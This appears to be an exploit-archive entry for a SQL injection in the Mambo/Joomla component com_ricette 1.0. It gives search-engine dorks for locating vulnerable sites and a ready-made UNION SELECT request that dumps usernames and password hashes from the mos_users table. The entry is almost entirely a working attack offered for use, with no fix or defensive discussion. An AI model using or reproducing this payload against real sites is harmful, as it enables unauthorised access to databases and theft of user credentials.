id: 2652
date: 02/16/2008
title: Mambo Component Ricette 1.0 Remote SQL Injection Vulnerability
author: S@BUN
cves: 

==============================================================
Mambo Component Ricette 1.0 Remote SQL Injection Vulnerability
==============================================================



###############################################################
#
# joomla SQL Injection(com_ricette)
#
################################################################
#
# DORK 1 : allinurl: com_ricette
#
# DORK 2 : allinurl: "com_ricette"id
#
################################################################
EXPLOIT :

index.php?option=com_ricette&Itemid=S@BUN&func=detail&id=-9999999/**/union/**/select/**/0,0,%20%20%200x3a,111,222,333,0,0,0,0,0,1,1,1,1,1,1,1,1,1,0,0,concat(username,0x3a,password)/**/from/**/mos_users/*




#  0day.today [2023-03-22]  #